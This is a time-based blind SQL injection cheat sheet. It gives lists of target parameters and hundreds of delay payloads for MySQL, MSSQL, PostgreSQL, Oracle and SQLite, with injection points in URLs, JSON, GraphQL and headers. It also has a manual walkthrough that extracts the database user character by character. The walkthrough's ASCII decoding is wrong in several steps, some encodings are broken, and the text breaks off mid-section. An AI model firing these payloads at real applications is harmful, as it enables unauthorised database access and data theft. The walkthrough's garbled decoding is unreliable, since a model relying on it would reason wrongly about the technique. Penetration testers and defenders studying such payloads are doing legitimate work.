Time-based Blind SQL Injection

Time-based SQL Injection
Blind SQL Injection

Description:
Time-based Blind SQL Injection is an inferential SQL Injection technique that uses a SQL query to delay the database to wait for a set period of time (in seconds) be-for response. The attacker will be able to identify if the query result is TRUE or FALSE based on the response time. An HTTP response will be returned with a delay or instantly, depending on the outcome. No data from the database is returned, an attacker can determine if the payload used returned true / false.

Where you will hunt for Blind SQL Injection:

Time Based Method (GET,POST,PUT)

Apply on:
Search, full name, surname, number, any kind of date, Email, Password (register, login, reset password), Any kind of Product, menu, keyword, payment, Cookie, User-agent, Referrer, X-Forwarded-For

Which Parameter you will try:

id
cid
pid
page
search
username
name
register
first name
email
pass
password
dir
category
class
register
file
news
item
menu
lang
name
ref
title
time
view
topic
thread
type
date
form
join
main
nav
region
select
report
role
update
query
user
sort
where
params
process
row
table
from
results
sleep
fetch
order
keyword
column
field
delete
string
number
filter

MySQL Blind (Time Based) SQL Injection Query:

0’XOR(if(now()=sysdate(),sleep(5),0))XOR’Z
0’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z
if(now()=sysdate(),sleep(5),0)
‘XOR(if(now()=sysdate(),sleep(5),0))XOR’
‘XOR(if(now()=sysdate(),sleep(5*1),0))OR’
if(now()=sysdate(),sleep(5),0)/”XOR(if(now()=sysdate(),sleep(5),0))OR”/
if(now()=sysdate(),sleep(5),0)/*’XOR(if(now()=sysdate(),sleep(5),0))OR'”XOR(if(now()=sysdate(),sleep(5),0))OR”*/
if(now()=sysdate(),sleep(5),0)/’XOR(if(now()=sysdate(),sleep(5),0))OR'”XOR(if(now()=sysdate(),sleep(5),0) and 5=5)”/
SLEEP(5)/*’ or SLEEP(5) or ‘” or SLEEP(5) or “*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
‘%2b(select*from(select(sleep(5)))a)%2b’
(select*from(select(sleep(5)))a)
1’%2b(select*from(select(sleep(5)))a)%2b’
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)–
‘+(select*from(select(sleep(5)))a)+’
(select(0)from(select(sleep(5)))v)%2f’+(select(0)from(select(sleep(5)))v)+'”
(select(0)from(select(sleep(5)))v)%2f*’+(select(0)from(select(sleep(5)))v)+'”+(select(0)from(select(sleep(5)))v)+”*%2f
(select(0)from(select(sleep(5)))v)/*’+(select(0)from(select(sleep(5)))v)+'”+(select(0)from(select(sleep(5)))v)+”*/

AND BLIND Query:

1 and sleep 5–
1 and sleep 5
1 and sleep(5)–
1 and sleep(5)
‘ and sleep 5–
‘ and sleep 5
‘ and sleep 5 and ‘1’=’1
‘ and sleep(5) and ‘1’=’1
‘ and sleep(5)–
‘ and sleep(5)
‘ AnD SLEEP(5) ANd ‘1
and sleep 5–
and sleep 5
and sleep(5)–
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)–
AnD SLEEP(5)#
and sleep 5–
and sleep 5
and sleep(5)–
and sleep(5)
and SELECT SLEEP(5); #
‘ AND SLEEP(5)#
” AND SLEEP(5)#
‘) AND SLEEP(5)#

OR BLIND Query:

or sleep 5–
or sleep 5
or sleep(5)–
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)–
or SLEEP(5)=”
or SLEEP(5)=’
or sleep 5–
or sleep 5
or sleep(5)–
or sleep(5)
or SELECT SLEEP(5); #
‘ OR SLEEP(5)#
” OR SLEEP(5)#
‘) OR SLEEP(5)#

You can replace AND / OR:

1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
‘ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ‘1337’=’1337
‘) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (‘PBiy’=’PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
‘) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
‘ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
” AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
‘) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (‘1337’=’1337
‘)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((‘1337’=’1337
‘))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((‘1337’=’1337
‘ AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND ‘1337’=’1337
‘) AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND (‘1337’=’1337
‘)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((‘1337’ LIKE ‘1337
‘))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((‘1337’ LIKE ‘1337
%’ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ‘1337%’=’1337
‘ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ‘1337’ LIKE ‘1337
“) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (“1337″=”1337
“)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((“1337″=”1337
“))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((“1337″=”1337
” AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND “1337”=”1337
“) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (“1337” LIKE “1337
“)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((“1337” LIKE “1337
“))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((“1337” LIKE “1337
” AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND “1337” LIKE “1337
‘ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ‘1337’=’1337
‘) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
“) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337

RLIKE BLIND Query:

RLIKE SLEEP(5)–
‘ RLIKE SLEEP(5)–
‘ RLIKE SLEEP(5)– 1337
” RLIKE SLEEP(5)– 1337
‘) RLIKE SLEEP(5)– 1337
‘) RLIKE SLEEP(5) AND (‘1337’=’1337
‘)) RLIKE SLEEP(5) AND ((‘1337’=’1337
‘))) RLIKE SLEEP(5) AND (((‘1337’=’1337
) RLIKE SLEEP(5)– 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)– 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)– 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)– 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)– 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)– 1337
` WHERE 1337=1337 RLIKE SLEEP(5)– 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)– 1337
‘ RLIKE SLEEP(5) AND ‘1337’=’1337
‘) RLIKE SLEEP(5) AND (‘1337’ LIKE ‘1337
‘)) RLIKE SLEEP(5) AND ((‘1337’ LIKE ‘1337
‘))) RLIKE SLEEP(5) AND (((‘1337’ LIKE ‘1337
%’ RLIKE SLEEP(5) AND ‘1337%’=’1337
‘ RLIKE SLEEP(5) AND ‘1337’ LIKE ‘1337
“) RLIKE SLEEP(5) AND (“1337″=”1337
“)) RLIKE SLEEP(5) AND ((“1337″=”1337
“))) RLIKE SLEEP(5) AND (((“1337″=”1337
” RLIKE SLEEP(5) AND “1337”=”1337
“) RLIKE SLEEP(5) AND (“1337” LIKE “1337
“)) RLIKE SLEEP(5) AND ((“1337” LIKE “1337
“))) RLIKE SLEEP(5) AND (((“1337” LIKE “1337
” RLIKE SLEEP(5) AND “1337” LIKE “1337
‘ RLIKE SLEEP(5) OR ‘1337’=’1337
‘) WHERE 1337=1337 RLIKE SLEEP(5)– 1337
“) WHERE 1337=1337 RLIKE SLEEP(5)– 1337
‘ WHERE 1337=1337 RLIKE SLEEP(5)– 1337
” WHERE 1337=1337 RLIKE SLEEP(5)– 1337

ELT Blind SQL Injection Query:

‘ AND ELT(1337=1337,SLEEP(5))–
‘ AND ELT(1337=1337,SLEEP(5))– 1337
” AND ELT(1337=1337,SLEEP(5))– 1337
‘) AND ELT(1337=1337,SLEEP(5))– 1337
‘) AND ELT(1337=1337,SLEEP(5)) AND (‘1337’=’1337
‘)) AND ELT(1337=1337,SLEEP(5)) AND ((‘1337’=’1337
‘))) AND ELT(1337=1337,SLEEP(5)) AND (((‘1337’=’1337
‘ AND ELT(1337=1337,SLEEP(5)) AND ‘1337’=’1337
‘) AND ELT(1337=1337,SLEEP(5)) AND (‘1337’ LIKE ‘1337
‘)) AND ELT(1337=1337,SLEEP(5)) AND ((‘1337’ LIKE ‘1337
‘))) AND ELT(1337=1337,SLEEP(5)) AND (((‘1337’ LIKE ‘1337
) AND ELT(1337=1337,SLEEP(5))– 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))– 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%’ AND ELT(1337=1337,SLEEP(5)) AND ‘1337%’=’1337
‘ AND ELT(1337=1337,SLEEP(5)) AND ‘1337’ LIKE ‘1337
“) AND ELT(1337=1337,SLEEP(5)) AND (“1337″=”1337
“)) AND ELT(1337=1337,SLEEP(5)) AND ((“1337″=”1337
“))) AND ELT(1337=1337,SLEEP(5)) AND (((“1337″=”1337
” AND ELT(1337=1337,SLEEP(5)) AND “1337”=”1337
“) AND ELT(1337=1337,SLEEP(5)) AND (“1337” LIKE “1337
“)) AND ELT(1337=1337,SLEEP(5)) AND ((“1337” LIKE “1337
“))) AND ELT(1337=1337,SLEEP(5)) AND (((“1337” LIKE “1337
” AND ELT(1337=1337,SLEEP(5)) AND “1337” LIKE “1337
‘ AND ELT(1337=1337,SLEEP(5)) OR ‘1337’=’FMTE
‘) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
“) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
‘ WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
” WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
‘||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||’
‘||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||’
‘+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+’
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
‘)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
“)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
‘) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
“) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337

BENCHMARK Query:

‘ AND 1337=BENCHMARK(5000000,MD5(0x774c5341))–
‘ AND 1337=BENCHMARK(5000000,MD5(0x774c5341))– 1337
” AND 1337=BENCHMARK(5000000,MD5(0x774c5341))– 1337
‘) AND =BENCHMARK(5000000,MD5(0x774c5341))–
‘) AND 1337=BENCHMARK(5000000,MD5(0x774c5341))– 1337
‘) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (‘1337’=’1337
‘)) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((‘1337’=’1337
‘))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (((‘1337’=’1337
‘ AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ‘1337’=’1337
‘) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (‘1337’ LIKE ‘1337
‘)) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((‘1337’ LIKE ‘1337
‘))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (((‘1337’ LIKE ‘1337
%’ AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ‘1337%’=’1337
‘ AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ‘1337’ LIKE ‘1337
“) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (“1337″=”1337
“)) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((“1337″=”1337
“))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (((“1337″=”1337
” AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND “1337”=”1337
“) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (“1337” LIKE “1337
“)) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((“1337” LIKE “1337
“))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (((“1337” LIKE “1337
” AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND “1337” LIKE “1337
‘ AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND ‘1337’=’1337

Microsoft SQL Server (Time Based) Blind SQL Injection Query:

;waitfor delay ‘0:0:5’–
‘;WAITFOR DELAY ‘0:0:5’–
);waitfor delay ‘0:0:5’–
‘;waitfor delay ‘0:0:5’–
“;waitfor delay ‘0:0:5’–
‘);waitfor delay ‘0:0:5’–
“);waitfor delay ‘0:0:5’–
));waitfor delay ‘0:0:5’–
‘));waitfor delay ‘0:0:5’–
“));waitfor delay ‘0:0:5’–
“) IF (1=1) WAITFOR DELAY ‘0:0:5’–
‘;%5waitfor%5delay%5’0:0:5’%5–%5
‘ WAITFOR DELAY ‘0:0:5’–
‘ WAITFOR DELAY ‘0:0:5’
or WAITFOR DELAY ‘0:0:5’–
or WAITFOR DELAY ‘0:0:5’
and WAITFOR DELAY ‘0:0:5’–
and WAITFOR DELAY ‘0:0:5’
WAITFOR DELAY ‘0:0:5’
;WAITFOR DELAY ‘0:0:5’–
;WAITFOR DELAY ‘0:0:5’
1 WAITFOR DELAY ‘0:0:5’–
1 WAITFOR DELAY ‘0:0:5’
1 WAITFOR DELAY ‘0:0:5′– 1337
1’ WAITFOR DELAY ‘0:0:5’ AND ‘1337’=’1337
1′) WAITFOR DELAY ‘0:0:5’ AND (‘1337’=’1337
1) WAITFOR DELAY ‘0:0:5’ AND (1337=1337
‘) WAITFOR DELAY ‘0:0:5’–
” WAITFOR DELAY ‘0:0:5’–
‘)) WAITFOR DELAY ‘0:0:5’–
‘))) WAITFOR DELAY ‘0:0:5′–
%’ WAITFOR DELAY ‘0:0:5’–
“) WAITFOR DELAY ‘0:0:5’–
“)) WAITFOR DELAY ‘0:0:5’–
“))) WAITFOR DELAY ‘0:0:5’–

PostgreSQL (Time Based) Blind SQL Injection Query:

“;SELECT pg_sleep(5);
;SELECT pg_sleep(5);
and SELECT pg_sleep(5);
1 SELECT pg_sleep(5);
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5)–
1 or pg_sleep(5)–
” or pg_sleep(5)–
‘ or pg_sleep(5)–
1) or pg_sleep(5)–
“) or pg_sleep(5)–
‘) or pg_sleep(5)–
1)) or pg_sleep(5)–
“)) or pg_sleep(5)–
‘)) or pg_sleep(5)–
pg_SLEEP(5)
pg_SLEEP(5)–
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)–
or pg_SLEEP(5)#
‘ SELECT pg_sleep(5);
or SELECT pg_sleep(5);
‘ SELECT pg_sleep(5);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))– 1337
1’ AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ‘1337’=’1337
1′) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (‘1337’=’1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337

Oracle Blind (Time Based) SQL Injection Query:

1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)– 1337
‘ AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ‘1337’=’1337
‘) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (‘1337’=’1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337

Generic Time Based SQL Injection Query:

sleep(5)#
(sleep 5)–
(sleep 5)
(sleep(5))–
(sleep(5))
-sleep(5)
SLEEP(5)#
SLEEP(5)–
SLEEP(5)=”
SLEEP(5)=’
“;sleep 5–
“;sleep 5
“;sleep(5)–
“;sleep(5)
“;SELECT SLEEP(5); #
1 SELECT SLEEP(5); #
+ SLEEP(5) + ‘
&&SLEEP(5)
&&SLEEP(5)–
&&SLEEP(5)#
;sleep 5–
;sleep 5
;sleep(5)–
;sleep(5)
;SELECT SLEEP(5); #
‘&&SLEEP(5)&&’1
‘ SELECT SLEEP(5); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))–
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))–
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)–
ORDER BY SLEEP(5)#
AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
RANDOMBLOB(500000000/2)
AND 1337=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 1337=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(1000000000/2))))

If response delay between 5 to 7 Seconds. It means vulnerable.

Identification and Exploitation:

1. =payload
Example:
=0’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z
=(select(0)from(select(sleep(5)))v)
[email protected]’ WAITFOR DELAY ‘0:0:5’–
[email protected]’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z

2. =value payload
Example:
=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND ‘%’=’
=1’XOR(if(now()=sysdate(),sleep(5),0))OR’
=1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
=1 or sleep(5)#

MySQL Blind SQL Injection Query (Time Based):

[email protected]’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z

MSSQL Blind SQL Injection Query (Time Based):
[email protected]’ WAITFOR DELAY ‘0:0:5’–

3.

https://example.com/page/payload
https://example.com/page/value payload

Example:
https://example.com/page/if(now()=sysdate(),sleep(3),0)/”XOR(if(now()=sysdate(),sleep(3),0))OR”/
https://example.com/(select(0)from(select(sleep(5)))v)%2f’+(select(0)from(select(sleep(5)))v)+'”
https://example.com/page/1 AnD SLEEP(5)
https://example.com/page/1′ ORDER BY SLEEP(5)

4. Blind SQL Injection in JSON:

{payload}
[payload]
{value payload}

Example:

[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]
{AnD SLEEP(5)}
{1 AnD SLEEP(5)}
{1′ AnD SLEEP(5)–}
{sleep 5}
“emails”:[“AnD SLEEP(5)”]
“emails”:[“[email protected]’ OR SLEEP(5)#”]
{“options”:{“id”:[],”emails”:[“AnD SLEEP(5)”],

5. Blind SQL Injection in GraphQL:

{“operationName”:”pages”,”variables”:{“offset”:0,”limit”:10,”sortc”:”name Payload”,”sortrev”:false},”query”:”query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n”}
Example:
{“operationName”:”pages”,”variables”:{“offset”:0,”limit”:10,”sortc”:”name AND sleep(5)”,”sortrev”:false},”query”:”query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n”}

6. HTTP Header Based (Error Based, Time Based):

Referer: https://example.com/408685756payload
Cookie: _gcl_au=1.1.2127391584.1587087463paylaod
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87Payload
or
Referer: https://example.com/408685756 payload
Cookie: _gcl_au=1.1.2127391584.1587087463 paylaod
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Payload
X-Forwarded-For: paylaod

7. Blind SQL Injection Exploitation (Manual):

MySql Time Based:
RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).
SELECT * FROM products WHERE id=1-SLEEP(5)
RESULTING QUERY (WITH MALICIOUS BENCHMARK INJECTED).
SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())
RESULTING QUERY – TIME-BASED ATTACK TO VERIFY DATABASE VERSION.
SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = ‘5’, SLEEP(5), 0)

Time Based SQL Injection:
1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = ‘A’)#

Error Blind SQLi:

AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),’a’))– –
Ultimate Sql injection Payload:
SELECT * FROM some_table WHERE double_quotes = “IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*’XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR’|”XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR”*/”

Exploitation:
example.com/page/search?q=1 and sleep(5)–
Current user:
example.com/page/search?q=1 and if(substring(user(),1,1)=’a’,SLEEP(5),1)–
example.com/page/search?q=1 and if(substring(user(),2,1)=’a’,SLEEP(5),1)–
example.com/page/search?q=1 and if(substring(user(),3,1)=’a’,SLEEP(5),1)–

Table_Name Guessing:
example.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
example.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
example.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)=’a’,sleep(5),1)–

MSSQL Time Based:

RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).
SELECT * FROM products WHERE id=1; WAIT FOR DELAY ’00:00:5′
RESULTING QUERY (VERIFY IF USER IS SA).
SELECT * FROM products WHERE id=1; IF SYSTEM_USER=’sa’ WAIT FOR DELAY ’00:00:5′

Exploitation:
http://example.com/page.aspx?id=1; WAITFOR DELAY ’00:00:5′– (+5 seconds)
TIME-BASED Extraction of CURRENT DATABASE USER

Determine Length of USER:
http://example.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (LEN(USER)=4) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (LEN(USER)=5) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Result = 5 characters in length

Determine length, and try to find out CHAR value one character position at a time, like this:

http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Result = the first character CHAR value is 97 which is an “a”
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=50) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Result = the second character CHAR value is 50 which is a “d”
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))>58) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=59) WAITFOR DELAY ’00:00:5’—
Result = third character CHAR value is 59 which is the letter “m”
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))>54) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))=55) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Result = the fourth character CHAR value is 55 which is an “i”
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))>59) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))=15) WAITFOR DELAY ’00:00:5′– (+5 seconds)
the fifth character position has CHAR value of 15 which is the letter “n”
Database User = 97,50,59,55,15 = admin

TIME-BASED Extraction of 1st TABLE COLUMNS:

let’s enumerate some columns from the table(s) we found:
